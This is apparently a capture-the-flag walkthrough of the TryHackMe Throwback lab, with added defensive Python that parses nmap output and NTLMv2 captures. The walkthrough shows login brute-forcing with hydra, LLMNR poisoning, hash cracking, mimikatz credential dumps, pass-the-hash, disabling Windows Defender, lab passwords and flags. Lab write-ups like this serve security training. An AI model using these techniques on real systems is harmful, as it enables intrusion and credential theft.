Throwback - [THM]

Marmeus


    Introduction

    In this post I show the commands, links or files you need to use in order to gather the information required to answer all the questions in the Throwback lab.

    Note: The flags change dynamically so do not bother copying and pasting my flags.

    Throwback Network

    Task 7 - Entering the Breach

    kali@kali:~/Documents/THM/Throwback$ nmap -sV -sC -p- -v --min-rate 1000 -oN NetworkScan.txt 10.200.179.0/24  
    Nmap scan report for 10.200.179.138
    Host is up (0.046s latency).
    Not shown: 65531 filtered ports
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 7.5 (protocol 2.0)
    | ssh-hostkey:
    |_  4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)
    53/tcp  open  domain   (generic dns response: REFUSED)
    80/tcp  open  http     nginx
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Did not follow redirect to https://10.200.179.138/
    443/tcp open  ssl/http nginx
    | http-methods:
    |_  Supported Methods: GET HEAD POST
    |_http-title: pfSense - Login
    | ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
    | Subject Alternative Name: DNS:pfSense-5f099cf870c18
    | Issuer: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-07-11T11:05:28
    | Not valid after:  2021-08-13T11:05:28
    | MD5:   fe06 fa47 4d83 8454 e67a 1840 7ea8 d101
    |_SHA-1: 672e 5f8f 9b28 7cad 5789 c5be cb1c f3f2 6c63 dfb2
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.91%I=7%D=12/29%Time=61CC761E%P=x86_64-pc-linux-gnu%r(DNS
    SF:VersionBindReqTCP,E,"\0\x0c\0\x06\x81\x05\0\0\0\0\0\0\0\0");
    
    Nmap scan report for 10.200.179.219
    Host is up (0.046s latency).
    Not shown: 65524 filtered ports
    PORT      STATE SERVICE       VERSION
    22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
    | ssh-hostkey:
    |   2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)
    |   256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)
    |_  256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods:
    |   Supported Methods: OPTIONS TRACE GET HEAD POST
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Throwback Hacks
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds?
    3389/tcp  open  ms-wbt-server Microsoft Terminal Services
    | rdp-ntlm-info:
    |   Target_Name: THROWBACK
    |   NetBIOS_Domain_Name: THROWBACK
    |   NetBIOS_Computer_Name: THROWBACK-PROD
    |   DNS_Domain_Name: THROWBACK.local
    |   DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local
    |   DNS_Tree_Name: THROWBACK.local
    |   Product_Version: 10.0.17763
    |_  System_Time: 2021-12-29T14:53:02+00:00
    | ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local
    | Issuer: commonName=THROWBACK-PROD.THROWBACK.local
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2021-12-27T01:03:16
    | Not valid after:  2022-06-28T01:03:16
    | MD5:   f469 5c2b e0d2 e866 9f43 e7f1 f342 453e
    |_SHA-1: 6924 2ba7 f824 740f 9998 023d 91c4 563e 4e72 5622
    |_ssl-date: 2021-12-29T14:54:30+00:00; 0s from scanner time.
    5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Service Unavailable
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    49667/tcp open  msrpc         Microsoft Windows RPC
    49669/tcp open  msrpc         Microsoft Windows RPC
    49673/tcp open  msrpc         Microsoft Windows RPC
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2021-12-29T14:53:01
    |_  start_date: N/A
    
    Nmap scan report for 10.200.179.232
    Host is up (0.048s latency).
    Not shown: 65531 closed ports
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 4e:ef:ef:e7:60:94:87:99:d7:e1:ac:31:a1:04:04:36 (RSA)
    |   256 ac:cc:f1:cd:d4:03:cb:63:2c:56:80:30:66:26:ad:77 (ECDSA)
    |_  256 f4:dc:9d:b9:54:4a:e5:72:b9:40:19:f1:c5:75:ac:9b (ED25519)
    80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: 2D267521ED544C817FADA219E66C0CCC
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    | http-title: Throwback Hacks - Login
    |_Requested resource was src/login.php
    143/tcp open  imap     Dovecot imapd (Ubuntu)
    |_imap-capabilities: OK have IDLE post-login LOGIN-REFERRALS LOGINDISABLEDA0001 more capabilities ENABLE IMAP4rev1 listed ID SASL-IR LITERAL+ Pre-login STARTTLS
    | ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
    | Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-07-25T15:51:57
    | Not valid after:  2030-07-23T15:51:57
    | MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
    |_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
    |_ssl-date: TLS randomness does not represent time
    993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
    |_imap-capabilities: listed IDLE have LOGIN-REFERRALS post-login more capabilities ENABLE SASL-IR AUTH=PLAINA0001 ID OK IMAP4rev1 Pre-login LITERAL+
    | ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
    | Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-07-25T15:51:57
    | Not valid after:  2030-07-23T15:51:57
    | MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
    |_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
    |_ssl-date: TLS randomness does not represent time
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 10.200.179.250
    Host is up (0.046s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 bb:e5:c5:44:5c:ca:12:47:80:fc:35:6a:a8:30:12:e4 (RSA)
    |   256 b5:cc:d4:cd:0e:57:56:49:95:e5:fc:fc:17:74:0c:68 (ECDSA)
    |_  256 17:c6:0a:3d:e3:98:21:63:bf:2c:a4:f5:db:c1:00:53 (ED25519)
    1337/tcp open  http    Node.js Express framework
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Error
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    • 10.200.XXX.138 -> Firewall (PFsense)
    • 10.200.XXX.219 -> Windows IIS
    • 10.200.XXX.232 -> Linux MAIL
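An added example (my own code, not from the original post): a small parser for nmap's normal output (-oN) that turns a scan like the one above into per-host open-port lists and pulls out the script findings a defender would triage first (risky HTTP methods, SMB signing not required, the hostname leaked by rdp-ntlm-info). The embedded scan is a constructed excerpt of the output above, trimmed to the lines the parser uses.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt of the -oN output above, trimmed to the lines the parser uses.
SAMPLE_SCAN = """\
Nmap scan report for 10.200.179.219
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local

Host script results:
| smb2-security-mode:
|_    Message signing enabled but not required

Nmap scan report for 10.200.179.232
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-title: Throwback Hacks - Login
143/tcp open  imap     Dovecot imapd (Ubuntu)
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list = field(default_factory=list)   # NSE output attached to this port

@dataclass
class Host:
    address: str
    ports: list = field(default_factory=list)
    host_script_lines: list = field(default_factory=list)   # lines under "Host script results:"

    def open_ports(self):
        return [p for p in self.ports if p.state == "open"]

def parse_nmap(text):
    """Parse nmap normal output (-oN) into {address: Host}."""
    hosts, host, port, in_host_scripts = {}, None, None, False
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            host = hosts.setdefault(m.group(1), Host(m.group(1)))
            port, in_host_scripts = None, False
            continue
        if host is None:
            continue
        if line.startswith("Host script results:"):
            port, in_host_scripts = None, True
            continue
        m = PORT_RE.match(line)
        if m:
            port = Port(int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5))
            host.ports.append(port)
            continue
        if line.startswith("|"):
            # "| name:", "|   detail" and "|_ last line" each carry one line of script output.
            detail = line.lstrip("|_").strip()
            target = host.host_script_lines if in_host_scripts else (port.script_lines if port else None)
            if target is not None:
                target.append(detail)
    return hosts

def hostname(host):
    """Hostname leaked by rdp-ntlm-info, if the scan captured one."""
    for p in host.ports:
        for d in p.script_lines:
            if d.startswith("DNS_Computer_Name:"):
                return d.split(":", 1)[1].strip()
    return None

def findings(hosts):
    """(address, port, issue) triples worth triaging from the script output."""
    out = []
    for addr, host in hosts.items():
        for p in host.open_ports():
            for d in p.script_lines:
                if d.startswith("Potentially risky methods:"):
                    out.append((addr, p.number, "risky HTTP methods: " + d.split(":", 1)[1].strip()))
        if "Message signing enabled but not required" in host.host_script_lines:
            out.append((addr, 445, "SMB signing not required"))
    return out
```

Calling `findings(parse_nmap(SAMPLE_SCAN))` lists the TRACE method on the IIS host and the SMB signing setting on THROWBACK-PROD; `open_ports()` on the mail host gives the four ports the question below asks about.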

    What is the domain name?

    THROWBACK.local

    What is the HTTP title of the web server running on THROWBACK-PROD?

    Throwback Hacks

    How many ports are open on THROWBACK-MAIL?

    4

    What service is running on THROWBACK-FW01?

    pfSense

    What version of Apache is running on THROWBACK-MAIL?

    Apache/2.4.29

    Task 8 - Exploring the Caverns

    Who is the CEO of Throwback Hacks?

    http://10.200.XXX.219/#team -> Summers Winters

    Where is the company located?

    http://10.200.XXX.219/#contact -> Great Britain

    What is the guest username on the mail server?

    http://10.200.XXX.232/src/login.php -> tbhguest

    What is the guest password on the mail server?

    http://10.200.XXX.232/src/login.php -> WelcomeTBH1!

    What flag is found within the guest inbox?

    TBH{ede543c628d365ab772078b0f6880677}

    What flag is found in the guest contacts page?

    TBH{4060a70860f0a1648e5a991de1739888}

    Task 9 - Web Shells and You!

    Source: Link

    What username was used to access the configuration portal?

    admin

    What password was used to access the configuration portal?

    pfsense

    What menu tab contains a command prompt tab in the PFSense Configuration panel?

    Diagnostics/Command Prompt

    Task 10 - First Contact

    What log file was found that is not a default log?

    cat /var/log/login.log 
    Last Login 8/9/2020 15:51 -- HumphreyW:1c13639dba96c7b53d26f7d00956a364

    What user was found within the log?

    HumphreyW

    What is the hash of the user?

    1c13639dba96c7b53d26f7d00956a364 -> securitycenter

    What is the root flag on THROWBACK-FW01?

    cat /root/root.txt
    TBH{b6f17a9c06e75ea4a09b79e8d89f9749}

    What is the log flag on THROWBACK-FW01?

    /var/log/flag.txt
    TBH{c9cf8b688a9b8677a4546781527e4484}

    Task 11 - Wait, you mean just one this time?

    POST /src/redirect.php HTTP/1.1
    Host: 10.200.179.232
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 89
    Origin: http://10.200.179.232
    Connection: close
    Referer: http://10.200.179.232/src/login.php
    Cookie: SQMSESSID=on1cj6suhl1ebvv8ha7pq0mm41
    Upgrade-Insecure-Requests: 1
    
    
    login_username=tbhguest&secretkey=WelcomeTBH1%21&js_autodetect_results=1&just_logged_in=1
    

    Command:

    kali@kali:~/Documents/THM/Throwback$ cat users.txt 
    tbhguest
    HumphreyW
    SummersW
    FoxxR
    noreply
    DaibaN
    PeanutbutterM
    PetersJ
    DaviesJ
    BlaireJ
    GongoH
    MurphyF
    JeffersD
    HorsemanB
    
    kali@kali:~/Documents/THM/Throwback$ cat weakPasswords.txt 
    WelcomeTBH1!
    securitycenter
    Summer2020
    Fall2020
    Winter2020
    Autumn2020
    Summer2019
    Fall2019
    Winter2019
    Autumn2019
    Summer2018
    Fall2018
    Winter2018
    Autumn2018
    Management2020
    Management2019
    Management2018
    Password2020
    Password2019
    Password2018
    TBHSecurity2020
    TBHSecurity2018
    TBHSecurity2019
    Throwback2020
    Throwback2019
    Throwback2018
    Password123
    
    kali@kali:~/Documents/THM/Throwback$ hydra -L users.txt -P weakPasswords.txt 10.200.179.232 http-post-form '/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=incorrect' 
    [80][http-post-form] host: 10.200.179.232   login: tbhguest   password: WelcomeTBH1!
    [80][http-post-form] host: 10.200.179.232   login: HumphreyW   password: securitycenter
    [STATUS] 89.00 tries/min, 89 tries in 00:01h, 191 to do in 00:03h, 16 active
    [80][http-post-form] host: 10.200.179.232   login: PeanutbutterM   password: Summer2020
    [80][http-post-form] host: 10.200.179.232   login: DaviesJ   password: Management2018
    [STATUS] 64.67 tries/min, 194 tries in 00:03h, 86 to do in 00:02h, 16 active
    [80][http-post-form] host: 10.200.179.232   login: GongoH   password: Summer2020
    [80][http-post-form] host: 10.200.179.232   login: MurphyF   password: Summer2020
    [80][http-post-form] host: 10.200.179.232   login: JeffersD   password: Summer2020

    What is the username parameter in the POST request?

    login_username

    What is the password parameter in the POST request?

    secretkey

    What username found with hydra starts with an M?

    MurphyF

    What is the password found with hydra?

    Summer2020

    Task 12 - Gone Phishing

    msf6 exploit(multi/handler) > sessions 1
    [*] Starting interaction with 1...
    
    meterpreter > getuid
    Server username: THROWBACK-WS01\BlaireJ
    
    meterpreter > sysinfo
    Computer        : THROWBACK-WS01
    OS              : Windows 10 (10.0 Build 19041).
    Architecture    : x64
    System Language : en_US
    Domain          : THROWBACK
    Logged On Users : 10
    Meterpreter     : x86/windows

    What User was compromised via Phishing?

    BlaireJ

    What Machine was compromised during Phishing?

    THROWBACK-WS01

    What is the root flag on THROWBACK-WS01?

    meterpreter > cat C:\\Users\\BlaireJ\\Desktop\\root.txt
    TBH{9c5e361a2368723e042924180be7c958}

    What is the user flag on THROWBACK-WS01?

    meterpreter > cat C:\\Users\\humphreyw\\Desktop\\user.txt
    TBH{813e2c2709ceb02041891acaec55121d}

    Task 13 - Just a Drop Will Do

    kali@kali:~/Documents/THM/Throwback$ sudo responder -I tun0 -rdw -v  
    
    [SMB] NTLMv2-SSP Client   : 10.200.179.219
    [SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
    [SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:2f71c71c129872db:C2C361B7F2729FF632B3E0174EAA9CA8:010100000000000000647150A9FCD70162AD743085ED01C400000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000
    [SMB] NTLMv2-SSP Client   : 10.200.179.219
    [SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
    [SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:d18b1b179c6b5da6:8E585648F1086DB4DD79D6B4CA92388A:010100000000000000647150A9FCD701B4D13C91B3AFE5B500000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000

    What User fell victim to LLMNR Poisoning?

    PetersJ

    What is the 4th octet of the IP Address the LLMNR request came from?

    219

    What is the hostname of the device?

    THROWBACK-PROD
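An added example (not part of the original post) that decodes a Responder NTLMv2-SSP line into its fields: the server challenge, the NTProofStr, and the AV pairs inside the client blob, which carry the capture timestamp and the SPN the victim connected to. The sample line is reconstructed from the fields visible in the first capture above (same user, challenges, timestamp and AV strings; the SingleHost pair is left out), not copied byte for byte.

```python
import struct
from datetime import datetime, timedelta, timezone

# AvId values from MS-NLMP section 2.2.2.1 (AV_PAIR).
AV_NAMES = {0x0001: "NbComputerName", 0x0002: "NbDomainName", 0x0003: "DnsComputerName",
            0x0004: "DnsDomainName", 0x0005: "DnsTreeName", 0x0006: "Flags",
            0x0007: "Timestamp", 0x0008: "SingleHost", 0x0009: "TargetName",
            0x000A: "ChannelBindings"}
STRING_AVS = {0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0009}   # UTF-16LE string values
FILETIME_UNIX_EPOCH = 116444736000000000   # 100 ns ticks from 1601-01-01 to 1970-01-01

def filetime_to_iso(ticks):
    """Windows FILETIME (100 ns ticks since 1601) -> ISO-8601 UTC string."""
    secs, rem = divmod(ticks - FILETIME_UNIX_EPOCH, 10_000_000)
    stamp = datetime.fromtimestamp(secs, tz=timezone.utc) + timedelta(microseconds=rem // 10)
    return stamp.isoformat()

def parse_av_pairs(data):
    """Decode the AV_PAIR list that ends the NTLMv2 client blob."""
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        value = data[off + 4:off + 4 + av_len]
        off += 4 + av_len
        if av_id == 0:                      # MsvAvEOL
            break
        name = AV_NAMES.get(av_id, f"Unknown(0x{av_id:04x})")
        if av_id in STRING_AVS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 0x0007:
            pairs[name] = filetime_to_iso(struct.unpack("<Q", value)[0])
        elif av_id == 0x0006:
            pairs[name] = struct.unpack("<I", value)[0]
        else:
            pairs[name] = value.hex()
    return pairs

def parse_responder_line(line):
    """Split 'user::domain:serverchallenge:ntproofstr:blob' (Responder / hashcat -m 5600 layout)."""
    user, _, domain, server_challenge, ntproofstr, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE: RespType(1) HiRespType(1) Reserved(2+4) Timestamp(8)
    # ClientChallenge(8) Reserved(4) AvPairs(...)
    ticks, client_challenge = struct.unpack_from("<Q8s", blob, 8)
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "ntproofstr": ntproofstr, "timestamp": filetime_to_iso(ticks),
            "client_challenge": client_challenge.hex(), "av_pairs": parse_av_pairs(blob[28:])}

def review(parsed):
    """Defender-side observations: when it happened and what the victim was talking to."""
    av, notes = parsed["av_pairs"], []
    notes.append(f"{parsed['domain']}\\{parsed['user']} authenticated at {parsed['timestamp']} (server-supplied timestamp)")
    service, _, target = av.get("TargetName", "").partition("/")
    if target and target.replace(".", "").isdigit():
        notes.append(f"target SPN {service}/{target} names a bare IP, not a hostname")
    if av.get("NbDomainName") and av["NbDomainName"] != parsed["domain"]:
        notes.append(f"responding server claimed domain {av['NbDomainName']!r}, not {parsed['domain']!r}")
    return notes

# Constructed sample: the blob is rebuilt from the fields visible in the capture above.
def build_blob(ticks, client_challenge, av_pairs):
    body = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in av_pairs) + struct.pack("<HH", 0, 0)
    return (struct.pack("<BBHI", 1, 1, 0, 0) + struct.pack("<Q", ticks)
            + client_challenge + bytes(4) + body + bytes(4))

def u16(s):
    return s.encode("utf-16-le")

SAMPLE_TICKS = 0x01D7FCA950716400             # bytes 00647150A9FCD701 read little-endian
SAMPLE_BLOB = build_blob(SAMPLE_TICKS, bytes.fromhex("62AD743085ED01C4"), [
    (0x0002, u16("KJB4")),
    (0x0001, u16("WIN-XFFC9EEIYWC")),
    (0x0004, u16("WIN-XFFC9EEIYWC.KJB4.LOCAL")),
    (0x0003, u16("KJB4.LOCAL")),
    (0x0005, u16("KJB4.LOCAL")),
    (0x0007, struct.pack("<Q", SAMPLE_TICKS)),
    (0x0006, struct.pack("<I", 2)),               # 0x2: client supplies a MIC
    (0x000A, bytes(16)),                          # all-zero channel bindings
    (0x0009, u16("cifs/10.50.176.45")),           # SPN the victim tried to reach
])
SAMPLE_LINE = ("PetersJ::THROWBACK:2f71c71c129872db:C2C361B7F2729FF632B3E0174EAA9CA8:"
               + SAMPLE_BLOB.hex().upper())

if __name__ == "__main__":
    for note in review(parse_responder_line(SAMPLE_LINE)):
        print(note)
```

The decoded timestamp and target SPN are what an analyst keeps from such a capture: they date the event and show that the client was talking to a host it had only as an IP, in a domain (`KJB4`) that does not exist in THROWBACK.local.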

    Task 14 - We Will, We Will, Rockyou

    What is the cracked password from the pfSense hash?

    kali@kali:~/Documents/THM/Throwback$ john -w=/usr/share/wordlists/rockyou.txt --format=NT pfsense_hash.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
    Warning: no OpenMP support for this hash type, consider --fork=4
    Press 'q' or Ctrl-C to abort, almost any other key for status
    securitycenter   (?)
    1g 0:00:00:00 DONE (2021-12-29 11:57) 1.351g/s 1078Kp/s 1078Kc/s 1078KC/s seesaw22..sebial
    Use the "--show --format=NT" options to display all of the cracked passwords reliably
    Session completed
    

    What is the cracked password from LLMNR poisoning?

    kali@kali:~/Documents/THM/Throwback$ hashcat -m 5600 -r /opt/OneRuleToRuleThemAll.rule  responder_hashes.txt /usr/share/wordlists/rockyou.txt 
    PETERSJ::THROWBACK:d18b1b179c6b5da6:8e585648f1086db4dd79d6b4ca92388a:[...]:Throwback317
    

    Task 18 - SEATBELT CHECK!

    ====== CredEnum ======
      Target              : localadmin.pass
      UserName            : admin-petersj
      Password            : 
      CredentialType      : DomainPassword
      PersistenceType     : Enterprise
      LastWriteTime       : 8/25/2020 2:52:57 AM

    What user was found from seatbelt?

    admin-petersj

    Submit flag for THROWBACK-PROD in Task 4

    By executing the following command through an RDP session we can obtain all the flags on the machine.

    C:\Users\petersj\Documents>runas /savecred /user:admin-petersj /profile "cmd.exe"

    What is the flag from the poisoned user on THROWBACK-PROD?

    C:\User>type C:\\Users\\petersj\\Desktop\\user.txt
    TBH{277c5929d176569338ce0cff02f328c0}

    What is the second user flag on THROWBACK-PROD?

    C:\User>type C:\\Users\\blaitej.THROWBACK\\Desktop\\user.txt
    TBH{9b56df4dc5cbda864a246ebfe4964d6c}

    What is the root flag on THROWBACK-PROD?

    PS C:\Users> type C:\Users\Administrator\Desktop\root.txt
    TBH{4d6945c0b80283b875fc7c3a5a057da6}

    Task 20 - Not the soft and fluffy kind

    runas /savecred /user:admin-petersj /profile "C:\\Users\\petersj\\Documents\\launcher.bat"
    
    powershell/credentials/mimikatz/command
    privilege::debug sekurlsa::logonpasswords
    Authentication Id : 0 ; 182634 (00000000:0002c96a)
    Session           : Batch from 0
    User Name         : BlaireJ
    Domain            : THROWBACK
    Logon Server      : THROWBACK-DC01
    Logon Time        : 12/29/2021 8:50:13 PM
    SID               : S-1-5-21-3906589501-690843102-3982269896-1116
    	msv :	
    	 [00000003] Primary
    	 * Username : BlaireJ
    	 * Domain   : THROWBACK
    	 * NTLM     : c374ecb7c2ccac1df3a82bce4f80bb5b
    	 * SHA1     : 6522277853426f24275c4c0b0381458ef452e640
    	 * DPAPI    : db241bce607cacb4b04d032e25071f0f
    	tspkg :	
    	wdigest :	
    	 * Username : BlaireJ
    	 * Domain   : THROWBACK
    	 * Password : (null)
    	kerberos :	
    	 * Username : BlaireJ
    	 * Domain   : THROWBACK.LOCAL
    	 * Password : 7eQgx6YzxgG3vC45t5k9
    	ssp :	
    	credman :	
    	
    Authentication Id : 0 ; 77225 (00000000:00012da9)
    Session           : Batch from 0
    User Name         : Administrator
    Domain            : THROWBACK-PROD
    Logon Server      : THROWBACK-PROD
    Logon Time        : 12/29/2021 8:50:00 PM
    SID               : S-1-5-21-1142397155-17714838-1651365392-500
    	msv :	
    	 [00000003] Primary
    	 * Username : Administrator
    	 * Domain   : THROWBACK-PROD
    	 * NTLM     : a06e58d15a2585235d18598788b8147a
    	 * SHA1     : 4e40938facb10fb6aa244240301b791a0454f328
    	tspkg :	
    	wdigest :	
    	 * Username : Administrator
    	 * Domain   : THROWBACK-PROD
    	 * Password : (null)
    	kerberos :	
    	 * Username : Administrator
    	 * Domain   : THROWBACK-PROD
    	 * Password : (null)	

    What domain user was logged in?

    BlaireJ

    What is the user's hash?

    c374ecb7c2ccac1df3a82bce4f80bb5b

    What is the administrator's NTLM hash?

    a06e58d15a2585235d18598788b8147a

    Task 22 - Good Intentions, Courtesy of Microsoft

    ┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
    └─# proxychains crackmapexec smb 10.200.179.0/24 -u BlaireJ -d THROWBACK -H c374ecb7c2ccac1df3a82bce4f80bb5b 2>1 | grep \+
    SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:445 <--socket error or timeout!
     ...  OK                                                                                                                                                      
    SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
    SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
    SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
    SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b   
    
    kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ proxychains crackmapexec smb 10.200.179.0/24 -u HumphreyW -d THROWBACK -H 1c13639dba96c7b53d26f7d00956a364  2>1 | grep \+
    SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
    SMB         10.200.179.176  445    THROWBACK-TIME   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
    SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
    SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364

    Task 23 - Wallace and Gromit

    We need to disable Windows Defender's real-time monitoring in order to upload SharpHound.ps1, which we can do because we are a member of the Administrators group.

    kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains ssh "blairej"@10.200.179.222
    throwback/blairej@10.200.179.222's password: 7eQgx6YzxgG3vC45t5k9
    
    blairej@THROWBACK-WS01 C:\Users\BlaireJ> net user BlaireJ  
    [...]                  
    Local Group Memberships      *Administrators         
    Global Group memberships     *None 
    blairej@THROWBACK-WS01 C:\Users\BlaireJ>powershell -c "Set-MpPreference -DisableRealTimeMonitoring $true"
    
    blairej@THROWBACK-WS01 C:\Users\BlaireJ>
